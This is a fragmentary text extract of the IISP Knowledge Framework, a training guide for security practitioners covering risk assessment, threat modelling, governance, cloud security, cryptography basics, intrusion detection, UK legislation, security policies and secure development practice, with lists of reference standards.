Professional Documents
Culture Documents
1.1. Purpose
This document contains the IISP Knowledge Framework. It builds upon the IISP Skills Framework version
2.1. It contains in detail the knowledge that a practitioner should have at Levels 1 and 2
The definitions of these two levels are as follows:
Level 1: (Knowledge) Basic knowledge of principles/follow good user practice
Has acquired and can demonstrate basic knowledge associated with the skill, e.g. through training
or self-tuition.
Knowledge
Has acquired and can demonstrate the basic knowledge associated with the skill, for example has
attended a training course or completed an academic module in the skill. Understands how the
skill should be applied.
Practice
Can explain the principles of the skill and how it should be applied. This might include experience
of applying the skill to basic tasks in a training or academic environment, for example through
participation in syndicate exercises, undertaking practical exercises in using the skill, and/or
passing a test or examination. Should be aware of recent developments in the skill.
Topical
Access
Expands External Bodies
Skills Knowledge of Knowledge,
Framework Framework Standards etc
Cyber Security
Body of Knowledge
Figure 1 - Skills Framework, Knowledge Frame and Cyber Security Body of Knowledge Relationship
“Topical access” in this sense means providing access to up to date information of immediate relevance,
interest, or importance which expands upon the information contained in the Knowledge Framework.
Level 1 and Level 2 information is contained within the Knowledge Framework, whilst Level 3 and above
knowledge is contained in the “Cyber Security Body of Knowledge” (CyBOK). The CyBOK should be
considered as a logical construct. It contains all the standards, laws, regulations, papers and other
reference material that the Knowledge Framework provides topical access to.
• Knowledge Areas – provides an overview to each Knowledge Area and then topical references to
external documents and standards. Each Knowledge Area is then sub-divided into sub-areas.
• Knowledge Levels – provides an overview of each of the Skill Areas and then defines the knowledge
and practices required for levels 1 and 2.
The second part of the Knowledge Framework contains references, namely
• Common Terms – definitions of a wide range of common terms used in Cyber and Information
Security. When a common term is used in the Knowledge Area and Knowledge Levels sections it is
hyperlinked to this section.
• Abbreviations and Acronyms - a list of abbreviations and acronyms used in the document.
Figure 2 shows the structure of the Knowledge Framework in diagrammatic form.
Part 1
Topical
Access
External Bodies
of Knowledge,
Standards etc
Knowledge Areas
Cyber Security
Hyperlinks Body of Knowledge
Knowledge Levels
Part 2
Common
Terms
Abbrevs / Acronyms
In addition the document contains a mind map showing how the Skill Areas in the IISP Skills Framework
map to the Knowledge Areas.
Each one has topical resources and standards to look at for more information. In a few situations it has
not been possible to provide suitable topical references.
RESPOND DETECT
Rapidly address incidents Recognise incidents and threats
Mitigate the damage Monitor key areas and activities
Analyse and learn
The overall process of analysing and managing risks is called risk management. The first part of risk
management is called risk assessment. Risk assessment itself is then subdivided into three activities, as
follows:
• Risk identification.
• Risk analysis.
• Risk evaluation.
The purpose of risk identification is to determine what could happen to cause a potential loss, and to
gain insight into how, where and why the loss might happen. Risk identification involves identifying
assets, threats, existing controls, vulnerabilities and business impacts. Threat intelligence can be used to
inform on the threats and vulnerabilities to a system.
The risk identification stage is also sometimes referred to as a business impact analysis (BIA). A BIA
always commences with an understanding of what the organisation’s key assets are. These could
include such things as people, property, systems and information, and each will have some form of
value to the business.
The BIA will then examine the impact of a threat taking place on each of the key assets identified. The
impact can be measured objectively in purely numerical terms such as money or number of customers,
or can be measured more subjectively as high, medium or low. Apart from financial impacts, other
consequences may be on reputation, ability to provide customer service, or the ability to meet legal or
regulatory requirements. It is important that the asset owner within the business is involved in the BIA
as it is they who will have the best view of the asset’s value.
The next stage is risk analysis. This is the process to comprehend the nature of risk and to determine the
level of risk and provides the basis for risk evaluation and decisions about risk treatment. This analysis
takes into account impacts on the assets and the likelihood of threats. Risk analysis may be undertaken
in varying degrees of detail depending on the criticality of assets, extent of known vulnerabilities, and
prior incidents involving in the organisation. A risk analysis methodology may be qualitative or
quantitative, or a combination of these, depending on the circumstances. The output of the risk analysis
process is a list of risks with assigned levels of risk, using either a qualitative or quantitative method.
The final stage of risk assessment is risk evaluation. This is the process of comparing the results of risk
analysis with risk criteria to determine whether the risk is acceptable or tolerable. At this stage the
analysis can indicate which risks are within an organisation’s risk appetite or which requires treatment
to lower the level of level of risk so it is tolerable (known as risk tolerance).
Figure 6 provides an overview of risk management as described above. This type of figure can be found
in two ISO standards, ISO/IEC 27005 and ISO 31000.
Context Establishment is where an organisation articulates its objectives, defines the external and
internal parameters to be taken into account when managing risk, and sets the scope and risk criteria
for the remaining processes, such as risk assessment and risk treatment. During the Context
Establishment phase, all information about the organisation relevant to the information security risk
management context is established. This involves setting the basic criteria necessary such as:
• Risk evaluation criteria.
• Impact criteria.
• Risk acceptance criteria.
It is also used to define the scope and boundaries such as:
• Defining relevant assets.
• Articulating business objectives.
• Setting out the business processes in scope.
• Listing the legal and regulatory requirements applicable to the organisation.
• Interfaces to other organisation, for example were information is exchanged.
Context Establishment should also be used to define and set-up an appropriate governance structure.
They are a number of risk management methodologies and methods. Those in widespread use are
provided in the topical references section.
Either ISO/IEC 27005 or ISO 31000 can be used to perform risk management in a business continuity
context. Business Continuity Management (BCM) is focused on keeping an organisation working in the
face of disruptive events. Risk management for BCM is therefore focused on dealing with events that
have a major impact on the organisation. While risk management will consider all threats, BCM risk
management focuses on impacts and on developing a Business Continuity Plan (BCP) to deliver a more
resilient organisation. Many of the Business Continuity threats to an organisation, whether external or,
internal, have similar impacts. For example, a flu pandemic, industrial disputes, transport network
disruption or terrorist action will all have the same impact, namely a loss of people available to work.
The severity of the impact will differ depending on the duration of the disruption. A business continuity
risk assessment should also take into account environmental threats such as flooding and power
outage.
ISO 22301 is the standard that helps organisations put business continuity plans in place to protect
them, and help them recover from, disruptive incidents when they happen. It also helps identify
potential threats to a business and to build the capacity to deal with unforeseen events. We will talk
more about business continuity in the sections on policies, standards, procedures and incident
management.
Figure 7 illustrates an attack tree. The attacks are represented with a treelike structure that starts with a
root node. In this case it is marked as “Gain Access to System”. The root node has one or more child
conditions that must be true for an attacker to exploit a threat. In turn, any of these child conditions
may have one or more children of their own. Attack trees are quite easy to construct and offer an
overview on the attacks that might be made to a system.
Gain Access to
System
Man in The
Denial of Service Eavesdropping Spoofing Invalid Flow
Middle Attack
DNS Spoof
Attack trees can be quite sophisticated. For instance one could add annotations to each node including
whether a particular attack is possible/impossible or expensive/inexpensive. You can also use Boolean
algebra. For instance, you could use OR nodes where a successful attack is possible if any of its child
nodes occur, or if you have AND nodes the attack is possible only if all child nodes occur.
The next technique we will look at is called STRIDE which has been produced by Microsoft. It is
supported by the Microsoft SDL Threat Modeling Tool, which we will talk about shortly. STRIDE is
actually a threat classification scheme. STRIDE is an acronym for the following:
• Spoofing – using someone else’s credentials to gain access to otherwise inaccessible assets.
• Tampering – changing data to mount an attack.
• Repudiation – occurs when a user denies performing an action, but the target of the action has no
way to prove otherwise.
• Information disclosure – the disclosure of information to a user who does not have permission to
There are three common techniques used to define and record vulnerabilities, they are:
The National Vulnerability Database (NVD) is a U.S. government repository of standards based
vulnerability management data. This data enables automation of vulnerability management, security
measurement, and compliance. NVD includes databases of security checklists, security related software
flaws, misconfigurations, product names, and impact metrics. Each product vulnerability is identified
with a CVE value and CVSS scores.
Vulnerability management is a comprehensive approach to the development of a system of practices
and processes designed to identify, analyse and address vulnerabilities in hardware or software. It is
specifically designed to proactively mitigate or prevent the exploitation of vulnerabilities which exist in a
system or organisation.
Vulnerability management usually involves the following:
• Planned and regular vulnerability assessments.
• Review and actioning relevant CERT alerts.
• Obtaining and reviewing product vendor reports on vulnerabilities and updates.
• Engaging with operational teams to trigger appropriate patching of software.
• Engaging with architectural teams to implement new technical controls.
• Using threat intelligence to establish new vulnerabilities.
A number of products and service exist in assisting organisations to obtain and process threat
intelligence.
NIST SP 800-30 NIST Special Publication 800-30. Guide for Conducting Risk Assessments.
(September 2012)
http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-
30r1.pdf
The Open FAIT™ Body of The Open FAIT™ Body of Knowledge – A Pocket Guide: A Taxonomy and
Knowledge Method for Risk Analysis. Published by The Open Group. (2014)
ISBN 978 94 018 0018
Threat Modelling
Name Description and Location
Attack Trees https://www.schneier.com/academic/archives/1999/12/attack_trees.html.
Threat Modelling: Designing for Adam Shostack. John Wily & sons, Inc.
Security. ISBN 978-1-118-80999-0
Microsoft SDL Threat Modeling https://www.microsoft.com/en-us/sdl/adopt/threatmodeling.aspx
Tool
Threat Intelligence
Name Description and Location
MWR InfoSecurity Threat Intelligence: Collecting, Analysing, Evaluating. Paper produced with
the support of CPNI and CERT-UK
TAXII and STIX Information Sharing Specifications for Cybersecurity.
https://www.us-cert.gov/Information-Sharing-Specifications-Cybersecurity
WARP https://www.ncsc.gov.uk/articles/what-warp
and
https://www.warp.gov.uk/about-us/
2.3.1. Governance
Corporate governance refers to the mechanisms, processes and relationships by which organisation are
controlled and directed. Governance structures identify the rights and responsibilities among different
participants in the organisation, such as the board of directors, managers, shareholders, creditors,
auditors, regulators, and other stakeholders. It also includes the rules and procedures for making
decisions in corporate affairs. Information security governance is similar but it is the system by which an
organisation directs and controls information security. It should not be confused with information
security management, which we will cover next. Information security management is concerned with
making decisions to mitigate risks; information security governance is primarily concerned with who is
authorised to make decisions. Information security governance specifies the accountability framework
and provides oversight to ensure that risks are adequately mitigated, while information security
management ensures that security controls are implemented to mitigate risks.
Information security governance is the foundation of an Information Security Management System
(ISMS) as it provides both strategic and operational frameworks. It needs to make sure that its
objectives and strategies align with business objectives and strategies.
Information Security Governance must be viewed as being an integral part of the organisation’s wider
governance structures and mechanisms, such as IT, business continuity, risk management and financial
planning. In particular it must be seen as linking into overall corporate governance, as shown in Figure 9.
ISO/IEC 27014 was published in 2013 and provides guidance on the concepts and principles for the
governance of information security. The standard provides:
“guidance on concepts and principles for the governance of information security, by which
organisations can evaluate, direct, monitor and communicate the information security related
activities within the organisation” and is “applicable to all types and sizes of organisations”.
From ISO/IEC 27014, the principles of information security governance are to:
• Establish organisational wide information security.
• Adopt a risk based approach.
• Set the direction of investment decisions.
• Ensure conformance with internal and external requirements.
We will look at different types of physical, procedural and technical controls later on in this section.
However, first we will look at architectural aspects of designing security controls into a system and
organisation.
The SABSA model is layered, with the top layer, Contextual Security Architecture, being the business
requirements definition stage. At each lower layer a new level of abstraction and detail is developed,
going through the definition of the conceptual security architecture, logical services architecture,
physical security architecture and finally at the lowest layer, the selection of technologies and products
specified in the component security architecture.
Another ESA of note is The Open Group Architecture Framework (TOGAF). This is actually a framework
for enterprise architecture that provides an approach for designing, planning, implementing, and
governing. What The Open Group did, as of version 9.1, is define how security fitted into the TOGAF
methodology. As with SABSA it is business and risk driven.
Both SABSA and TOGAF are very prescriptive, however, with the benefit of usually providing repeatable
designs.
Note that a Technical Security Architecture will typically include three sub-architectures, namely:
• Infrastructure security architecture.
• Network security architecture.
• Application security architecture.
In the NIST Cloud Computing Reference Architecture (Special Publication 500-292) it defines five actors.
They include the Cloud Consumer and the Cloud Provider together with three others. They are:
• Cloud Broker: A Cloud Broker acts as an intermediary between the consumer of cloud services and
Cloud Providers. It negotiates relationships between Cloud Providers and Cloud Consumers. A Cloud
Consumer may request cloud services from a Cloud Provider directly or via a Cloud Broker. A Cloud
Broker may create a new service by combining multiple services, potentially from different Cloud
Providers, or by enhancing an existing service.
• Cloud Auditor: A Cloud Auditor is a party that can perform an independent examination of cloud
services, information system operations, performance and security of the cloud implementation.
Audits are performed to verify conformance to standards through review of evidence. The audit
may involve interactions with both the Cloud Consumer and the Cloud Provider. For security
auditing, a Cloud Auditor can make an assessment of the security controls in the information system
to determine the extent to which the controls are implemented correctly, operating as intended,
and producing the desired outcome with respect to the security requirements for the system. The
security auditing could also include the verification of the compliance with regulation and security
policy
• Cloud Carrier: A Cloud Carrier acts as an intermediary that provides connectivity and transport of
cloud services between Cloud Consumers and Cloud Providers.
Figure 14 illustrates the interrelationships between the actors defined in the NIST reference
architecture.
Level of Abstraction
Level of Control
Platform as a Service (PaaS)
Obviously Figure 15 is a simplification with Figure 16 showing a more detailed representation. This
figure illustrates the components within each service model and the types of services offered to the
Cloud Consumers.
SaaS
Presentation Presentation
Modality Platform
APIs
Applications
Depending on the service model, and the Cloud Provider, will dictate who is responsible for what part of
the service. This gives rise to an important concept called the shared responsibility model. Typically, a
Cloud Provider vendor will define their shared responsibility model for a given type of service and
service model. Public cloud adoption requires an organisation to evaluate how security operational and
assurance processes are applied and validated when cloud services are being consumed. The shared
responsibility model requires organisations to fully understand “who does what” in relation to security
operations. Often Cloud Providers supply technology but the customer retains operational
responsibility, although this depends on the service model being used. In a shared responsibility model
one needs to consider who is responsible for the following:
Customer Data
Customer IAM
Platform & Application Management
Managed by
Operating System, Network & Firewall Configuration AWS Customers
Client-Side Data
Encryption & Data Server-Side Network Traffic
Integrity Encryption Protection
Authentication
AWS IAM
Managed by
Compute Storage Databases Networking Amazon Web
Services
The Cloud Security Alliance (CSA) is a not-for-profit organisation with a mission to “promote the use of
best practices for providing security assurance within Cloud Computing, and to provide education on
the uses of Cloud Computing to help secure all other forms of computing”. Whilst it was established in
the US it has a number of chapters around the world, including the UK. Their seminal work is the
“Security Guidance for Critical Areas of Focus in Cloud Computing - Foundational best practices for
securing cloud computing”. The document’s intent is to establish a stable, secure baseline for cloud
operations. It describes a set of practices the CSA has put together in 14 domains involved in governing
or operating the cloud, namely:
• Cloud Computing Architectural Framework.
• Governance and Enterprise Risk Management.
• Contracts and Electronic Discovery.
• Compliance and Audit Management.
• Information Management and Data Security.
• Interoperability and Portability.
• Traditional Security, Business Continuity, and Disaster Recovery.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
2.4.11. Cryptography
Before we look at the technical controls we would like to introduce you to cryptography. As many
technical controls are based on cryptography it is important you have some understanding of this
subject.
Cryptography is the science of applying a complex mathematical operation to some data, whether it is a
message or data being transmitted or residing on a disk. Cryptography means literally hidden or secret
writing. It involves changing normal information into another form that hides it and makes it secret.
Cryptanalysis means literally untying something hidden. It involves recovering information that has been
hidden by someone else using cryptography.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
As we go on and explain different forms of cryptography it is useful to define two standard actors used
in describing cryptographic mechanisms. If you ever talk about cryptographic mechanisms it is usual to
refer to the processes using the following actors:
• Alice: she is an end user or computer without malicious intentions. She is one of the main users of
the cryptographic services being explained.
• Bob: he is Alice’s friend and also a main user of the cryptographic services. Like Alice, Bob does not
have any malicious intentions.
There are two forms of encryption and decryption you should be aware of. They are called symmetric
and asymmetric cryptography and use two different types of algorithms. Both these types of algorithms
use cryptographic keys.
In symmetric cryptography cryptographic keys are just very large randomly generated numbers. These
are called symmetric keys. The size of the key is specified in bits. The key space defines all possible
values used to construct a cryptographic key. The larger the key space the better. In the case of a 64-bit
key, the key space is 2 to the power of 64 (264). In other words, the number of possible values of the
key, i.e. the key space, is 18,446,744,073,709,600,000. Different symmetric algorithms support different
key sizes. In most environments it is recommended that you use keys with a minimum size of 128 bits
(i.e. a key space of 2128).
With this system, the symmetric algorithm transforms the plaintext message into ciphertext. This
transformation involves the symmetric key, being available only to legitimate senders and receivers of
the message. To reverse the process the ciphertext is fed into the symmetric algorithm together with
the symmetric key to recover the plaintext. This process is shown in Figure 19.
The strength of the protection in symmetric cryptography lies in the secrecy of the keys and NOT in the
algorithm. This is because most modern commonly used algorithms are in the public domain and freely
available to implement. It is therefore assumed that attackers have knowledge of the algorithm. The
most widely used symmetric algorithms are:
• Advanced Encryption Standard (AES). AES was originally adopted by the U.S. government and is
now used worldwide. AES supports three different key sizes: 128, 192 and 256 bits.
• Data Encryption Standard (DES). A cipher defined and endorsed by the U.S. government in 1977 as
an official standard. The key size of DES is 56 bits in length. Because of the small size of the key, this
algorithm is now considered insecure for many applications and should not be used.
• Triple DES (3DES). A technique for improving the security of DES is triple encryption, that is,
encrypting each message using three different DES keys. In general, Triple-DES, (with three
independent keys), has a key size of 168 bits (three 56-bit DES keys), but due to a cryptographic
weakness in this approach, the effective security it provides is only 112 bits.
Asymmetric cryptography requires the user to be provided with two keys, namely a public key and a
private key. As the public name implies, this is the key that is provided to the world, whilst the private
key is kept by the owner in a safe location. Figure 20 shows the processing of asymmetric cryptography.
In this type of cryptography one of the keys is used, via the asymmetric algorithm, to create the
ciphertext. To recover the original plaintext from the ciphertext then the other key is used. Asymmetric
cryptography is often referred to as Public Key Cryptography.
The private key and public key have a mathematical relationship with each other and are generated at
the same time. They are generated using a trapdoor one-way function. This means it is easy to compute
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
The second use case is shown in Figure 22. In this case Alice uses her private key to encrypt some data
and then send the ciphertext to Bob. Bob obtains Alice’s public key and uses this to decrypt the received
ciphertext from Alice. The two key points about this are:
• Anyone provided with Alice’s public key can decrypt the data.
• Anyone that successfully decrypted the message from Alice can be sure it came from her – as she
was the only entity processing her private key.
This property of asymmetric algorithms is not actually used for encrypting data but usually used for
creating and verifying digital signatures as well as distributing symmetric keys. We will talk more about
digital signatures shortly.
The most widely used asymmetric algorithms are:
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
To verify the digital signature the recipient decrypts the digital signature with the sender’ public key
(e.g. Alice) and verifies that the hash value received matches what they expected. This is achieved by
independently calculating the hash over the received data and comparing that with the value of the
hash just received.
Content Control
The purpose of content control is to block content entering or leaving an organisation where that
content does not conform to the corporate policy. This is sometimes referred to as content inspection.
The policy could be in place for many reasons, some of which might include:
Cryptographic Services
There is a large number of security controls based on cryptography. Many of these are of a comms
nature and we will cover them in the Trusted Communications section. In this section we will look at a
few other security controls based on cryptography.
The first one we will look at is the Public Key Infrastructure, which we covered in the cryptography
section. In its purest sense a PKI is used to securely generate and distribute public keys in the form of
public key certificates. The public keys in the certificates can then be used by applications or services to
support cryptographic based controls – such as Virtual Private Networks or secure email. Organisations
can build their own PKIs and there are also a number of public PKIs – many of which are used to secure
public web sites with TLS. We will cover TLS in the Trusted Communications section.
Digital signature services are used to digitally sign a message, document or other information object.
The service is also then used to verify the digital signature. Signature services are typically used in
conjunction with a PKI. You will very rarely find digital signature services by themselves, rather they are
components of a larger offering, such as a service offering digitally signed contracts or other legal
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
Detection
Detection security controls are designed to detect and possibly block or prevent abnormal behaviour.
Intrusion detection systems are designed to identify that an intrusion has been attempted, is occurring,
or has occurred and possibly respond. However, Intrusion prevention system are designed to identify
and then actually block the attack. There are four variants of these systems:
• Network Intrusion Detection System (NIDS). These products attempt to identify unauthorised, illicit,
and anomalous behaviour based solely on network traffic as the traffic traverses a NIDS sensor. A
NIDS, using either a network tap, span port, or hub collects IP packets that traverse a given network.
Using the captured data, the NIDS system processes and flags, and optionally reports or alerts, any
suspicious traffic. The role of a NIDS is passive, only gathering, identifying, logging and alerting.
• Network Intrusion Prevention System (NIPS). Very similar to a NIDS except this device actually
blocks any traffic it believes to be suspicious. Most network products of this type can be configured
to operate in either NIDS or NIPS mode.
• Host Intrusion Detection System (HIDS). These products attempts to identify unauthorised, illicit,
and anomalous behaviour on a specific device, whether it is a server or workstation. HIDS generally
involves an agent installed on each system, monitoring and alerting on local OS and application
activity. The installed agent uses a combination of signatures, rules, and heuristics to identify
unauthorised activity. Like a NIDS, the role of a HIDS is passive, only gathering, identifying, logging,
and alerting.
• Host Intrusion Prevention System (HIPS). Similar to a HIDS except they can be configured to block
activity. Most products in this space can operate in either HIDS or HIPS mode, and usually on a rule
by rule basis.
Placement of sensors is important in enterprise architectures. NIDS/NIPS products are not able to
properly inspect traffic if it is encrypted. For instance don’t place a sensor between web clients and SSL
accelerators; instead place the sensor after the accelerators where the traffic is decrypted.
NIDS/NIPS can also be placed in networks in two different types of location. The first type of location is
by attaching the sensor to a spanning port of a network switch. All traffic coming in and out of the
network switch is copied over to the span port. Hence the sensor can view all traffic on the network
switch. When operating like this the device can only operate in NIDS mode. It is unable to block traffic.
The other location is when it is placed in-line. This means that all network traffic must go through the
device. Hence the devices can operate in NIPS mode (and NIDS if configured to do so) as it is now able
to block traffic if it so wishes. Figure 25 illustrates this point.
Span Port
NIDS Sensor
Firewall
Server Server
Firewall
In-line NIDS/NIPS
Sensor
Implementation of an IDS/IPS is not without its problems and requires a highly skilled and trained team
to manage it effectively. Initially, when first installed, you will see many false positives and false
negatives, both of which require skilled tuning. Hence you could see normal behaviour falsely triggering
an alert (false positives) or situations when alerts should have been raised but were not detected (false
negatives). It will take some time to bed down an IPS until it is effective.
File integrity monitoring is a security control that that validates the integrity of operating system and
application software files. It does this by comparing the current file state and a known, good baseline.
Should a file change due to virus activity or corruption, the file will no longer match the recorded
integrity information of the original file. Hence it alerts you, and/or an administrator, to changes in
critical system files, application programs, configuration files, and content files.
The next security control we will talk about is Transport Layer Security (TLS). TLS and its predecessor,
Secure Sockets Layer (SSL), both frequently referred to as "SSL", are cryptographic protocols used to
carry application traffic, such as HTTP. It can, however, carry other types of application traffic too, such
as email.
The security controls that TLS and SSL provide are as follows:
Design Patterns
Name Description and Location
OSA Open Security Architecture
http://www.opensecurityarchitecture.org/cms
O-ESA Open Enterprise Security Architecture (O-ESA) – A Framework and Template
for Policy-Driven Security. The Open Group, 2011. ISBN 978-90-8753-672-5.
Cryptography
Name Description and Location
Everyday Cryptography Keith M Martin. Everyday Cryptography. Oxford University Press. Published
2012. ISBN 978-0-19-969559-1
NIST SP 800-175A NIST Special Publication 800-175A. Guideline for Using Cryptographic
Standards in the Federal Government: Directives, Mandates and Policies
(August 2016).
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175A.pdf
NIST SP 800-175B NIST Special Publication 800-175A. Guideline for Using Cryptographic
Standards in the Federal Government: Cryptographic Mechanisms (August
2016).
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175B.pdf
Internet of Things
Name Description and Location
IoT Security Foundation IoT Security Foundation Guidelines
https://iotsecurityfoundation.org/best-practice-guidelines/
OWASP IoT OWASP Internet of Things Project.
https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project
Policies, standards, procedures, and guidelines are influenced by relevant legislation, for example the
Data Protection Act in the UK. Depending on the industry the organisation may also need to be
compliant with one more regulations. Contracts between organisations may also call up legislation and
regulations that sub-contractors must adhere with.
The relationship between these various artefacts are shown in Figure 27.
2.5.1. Legislation
In this section we go through primary legislation that affects information security within the UK. Many
countries have similar laws. It’s not possible in this document to through all the legislation, or
regulations, that might impact a given organisation or industry. Good sources include:
• http://www.legislation.gov.uk/. This contains details all of the Acts and regulations passed by the
UK parliament.
• http://eur-lex.europa.eu. EUR-Lex is an official website of European Union law and other public
documents of the European Union (EU)
Data Protection Act
The Data Protection Act 1998 (DPA) controls how personal data is used by organisations, businesses or
the government. The DPA defines eight data protection principles, which apply in various contexts, to
ensure that information is processed lawfully. In summary the eight principles are:
• Principle 1: Personal data shall be processed fairly and lawfully.
• Principle 2: Personal data shall be used for limited, specifically stated purposes.
• Principle 3: Personal data shall be adequate, relevant and not excessive in relation to the purpose or
purposes for which they are processed.
• Principle 4: Personal data shall be accurate and, where necessary, kept up to date.
• Principle 5: Personal data shall be kept for no longer than is absolutely necessary.
• Principle 6: Personal data shall be handled according to people’s data protection rights
• Principle 7: Appropriate technical and organisational measures shall be taken against unauthorised
2.5.3. Policies
According to ISO/IEC 27000:2016 a policy is:
In effect a security policy establishes what must be done to protect information whether it is stored on
a computer is on paper. A well written policy contains sufficient definition of “what” to do so that the
“how” can be identified and measured or evaluated. A policy needs management commitment,
supporting procedures and an appropriate technical framework within which it can be implemented. It
is important that there is a means by which compliance can be checked and a visible statement on the
consequences of the policy being violated.
2.5.4. Standards
An organisation will refer to a number of external security standards, or if they are not appropriate,
develop their own. In this section we will give you an idea of a few of the security standards that a
typical organisation may require. Different business communities and sectors may well have different
types of standards. For instance there are different standards in the defence, public sector, health, retail
and finance sectors.
Some of these standards we referred to in the previous section. As with the policies section, the
description of the standards are not meant to be complete, but rather are intended to give you an idea
on some of the topics they address. Many of these standards will have an associated procedure
containing specific instructions for performing some function or action in order to be compliant with the
standard.
Audit and Logging Standard
This standard defines what audit events are logged and when. For instance you may require that
applications log access to every single record in a database when it contains personal data – and this
would include both read and write access. Some other examples are:
• User authentication and authorisation such as user login and logout
• Grant, modify, or revoke privileges, including adding a new user or group, changing user privilege
levels, changing file permissions, changing database object permissions.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
Professionals and may be used only with express permission of the Institute.
2.5.5. Guidelines
As we said earlier a guideline is a collection of system specific or procedural specific "suggestions" for
best practice. They are not requirements to be met, but are strongly recommended. Guidelines can
provide advice, direction and best practice in instances where it is difficult to define a policy or
procedure. Organisations can produce just a few or as many as feel they want to. Typical titles of
guidelines are provided below. You should be able to work out what most of them are intended to do:
• Information classification guidelines.
• Using encryption to protect your data.
• Guideline for Virus Protection.
• Guidance on Backing-up Data
• Electronic Mail guidelines.
• Use of USB memory sticks.
• Remote Access guidance.
• Spam, Phishing and Spear Phishing emails.
• Data Protection Act guidance.
• Sharing Data with External Organisations guidance.
• Guidelines when working from home.
• Travelling aboard.
• Guidance on Social Media and Social Networking
This list is not supposed to be exhaustive by any means but it should give you an idea of the type of
guidelines or guidance an organisation could have.
Copyright, Designs and Patents Copyright, Designs and Patents Act 1988
Act http://www.legislation.gov.uk/ukpga/1988/48/contents
NIS Directive DIRECTIVE (EU) 2016/1148 OF THE EUROPEAN PARLIAMENT AND OF THE
COUNCIL of 6 July 2016 concerning measures for a high common level of
security of network and information systems across the Union
http://eur-lex.europa.eu/legal-
content/EN/TXT/PDF/?uri=CELEX:32016L1148&rid=1
General Data Protection The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679)
Regulation http://eur-lex.europa.eu/legal-
content/EN/TXT/PDF/?uri=CELEX:32016R0679&from=EN
Policies
Name Description and Location
ISO/IEC 27002 ISO/IEC 27002:2013. Information technology — Security techniques —
Information security management systems —Code of practice for
information security controls. Part of the ISO/IEC 27000 family of standards.
Standards
Name Description and Location
NIST Special Publication 800-88 Guidelines for Media Sanitization
Revision 1 http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf
Guidelines
Name Description and Location
ISO/IEC 27002 ISO/IEC 27002:2013. Information technology — Security techniques —
Information security management systems —Code of practice for
information security controls. Part of the ISO/IEC 27000 family of standards.
Security Awareness
Name Description and Location
PCI DSS guidance Best Practices for Implementing a Security Awareness Program
https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Pract
ices_for_Implementing_Security_Awareness_Program.pdf
NIST Special Publication 800-50 Building an Information Technology Security Awareness and Training
Program
http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-50.pdf
Strategies
Name Description and Location
NCSC NATIONAL CYBER SECURITY STRATEGY 2016-2021
https://www.gov.uk/government/uploads/system/uploads/attachment_data
/file/567242/national_cyber_security_strategy_2016.pdf
2.6.3. Testing
All software and applications must be tested. In section 2.2.3 we looked at vulnerability assessments
and penetration testing performed by specialised teams – potentially from external organisation. This
section is looking at the type of testing that the development teams could (or should!) be performing.
These tests are usually performed on a development or pre-production system, whereas vulnerability
assessments and penetration tests are frequently performed on a production system (although they can
also be undertaken on a pre-production system).
All development teams will do some testing usually of a functional nature – usually referred to as
functional testing. The problem with only doing this type of testing it that it only tests positive results –
referred to as positive testing. Testing must also be performed for erroneous and bad input – for
instance trying to inject code into a field that should only contain numeric values. This is termed
negative testing. In particular the testers in the development teams should be looking for SQL injection,
cross-site scripting and buffer overflow vulnerabilities.
Developers should also look at using static code analysis and fuzzing tools. Fuzzing is a software testing
technique, often automated or semi-automated, that involves providing invalid, unexpected, or random
data to the inputs of a program. The program is then monitored for exceptions such as crashes. Whilst
this is a specialist area most development staff should have no problem in using such tools.
OWASP have published the OWASP Testing Guide which is a very valuable resource for anyone involved
in developing and testing web applications.
2.6.4. Hardening
Hardening is also known as secure configuration and sometimes as lockdown. It is the secure
configuration of an operating system, device, service or an application to remove vulnerabilities that are
present in a standard build. Many products are sold in a form that is either insecure or allows attackers
easy access. Some products are sold already hardened – at least to some degree.
The basic principles of hardening is as follows:
• Reduce the attack surface of systems. This means not installing unnecessary components of
operating systems or applications. This is conform to the security design principle of minimisation
we mentioned previously.
• Changing default passwords to ones that have good password strength.
• Delete or disable unnecessary user accounts.
• Renaming of privileged accounts from their default name, e.g. “root”.
Non-Commercial - No Derivatives (BY-NC-ND) license.
2017 Copyright © The Institute of Information Security Professionals. All rights reserved. The Institute of Information Security Professionals®,
IISP®, A.Inst.ISP™, M.Inst.ISP®, F.Inst.ISP™ and various IISP graphic logos are trademarks owned by The Institute of Information Security
